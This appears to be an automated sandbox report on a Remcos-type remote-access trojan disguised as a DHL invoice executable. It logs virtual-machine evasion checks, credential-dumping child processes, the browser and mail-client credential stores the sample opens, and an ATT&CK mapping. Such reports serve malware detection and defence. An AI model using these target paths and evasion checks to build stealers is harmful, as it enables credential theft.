              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeAPI/Special instruction interceptor: Address: 34A974C
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeAPI/Special instruction interceptor: Address: 227974C
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403407963.0000000003F50000.00000004.00001000.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794715190.0000000002E80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: _C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423397325468.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEF
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423397325468.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 FILES\QEMU-GA\QEMU-GA.EXEP\
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeWindow / User API: threadDelayed 982Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeAPI coverage: 2.9 %
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_004059CC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_004065FD FindFirstFileW,FindClose,2_2_004065FD
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_00402868 FindFirstFileW,4_2_00402868
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004059CC
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_004065FD FindFirstFileW,FindClose,4_2_004065FD
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_346510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_346510F1
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34656580 FindFirstFileExA,4_2_34656580
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_00418981 memset,GetSystemInfo,5_2_00418981
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423397325468.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 Files\Qemu-ga\qemu-ga.exep\
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403407963.0000000003F50000.00000004.00001000.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794715190.0000000002E80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: _C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423397325468.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exef
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000002.00000002.423403469533.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeAPI call chain: ExitProcess graph end nodegraph_2-4299
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeAPI call chain: ExitProcess graph end nodegraph_2-4302
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeAPI call chain: ExitProcess graph end nodegraph_6-34113
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_73A4166D Free,LdrInitializeThunk,VirtualFree,GlobalFree,2_2_73A4166D
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_346560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_346560E2
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_73A41B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_73A41B5F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34654AB4 mov eax, dword ptr fs:[00000030h]4_2_34654AB4
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_3465724E GetProcessHeap,4_2_3465724E
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_346560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_346560E2
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34652639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_34652639
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34652B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_34652B1C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: NULL target: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: NULL target: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeSection loaded: NULL target: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\vmwhb"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\fobaczdn"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe /stext "C:\Users\user\AppData\Local\Temp\qipkdrohfbov"Jump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\hoaxbtopiw.vbs" Jump to behavior
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager$+.
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34652933 cpuid 4_2_34652933
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 4_2_34652264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_34652264
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_004082CD
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: 2_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040338F
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 9056, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: ESMTPPassword6_2_004033F0
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword6_2_00402DB3
              Source: C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword6_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 9056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 5828, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe PID: 9056, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting
              Valid Accounts11
              Native API
              11
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Registry Run Keys / Startup Folder
              112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
